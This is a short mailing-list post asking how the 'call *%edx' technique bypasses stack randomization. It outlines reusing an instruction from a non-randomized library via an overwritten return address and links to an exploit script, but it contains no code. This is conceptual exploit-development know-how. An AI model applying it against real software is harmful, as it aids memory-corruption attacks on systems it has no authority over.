problem in bypassing stack randomization ("call *%edx" technique)

[Pravin <shindepravin () gmail com>]

Hi,
I am working on vulnerabilities which will bypass stack randomization.
I came across a method ("call *%edx" technique) described in
http://rawlab.mindcreations.com/codes/exp/randstack/exp_call_rand.pl

As per my understanding, method works on the line of finding the library
which is not randomized.
then finding the instruction "call *%edx" in the assembly code of that
library,
and pass the control to this instruction by overwriting the return address
by the address of this instruction from non-randomized library.
I do understand that control will go to that function, but How can I control
the value of "*%edx" ?
I know I can control the value of "*%esp" but how can I overwrite "*%edx" ?
and if I dont control the value of "*%edx", then how my shellcode will get
executed?

I am missing something over here, Please let me know if I am wrong
somewhere.
I will apriciate if someone can give me link to some detailed documentation
for "call *%edx" technique or some hint of how it works and control passes
to shellcode exactly.
Thanx.

--
Pravin Shinde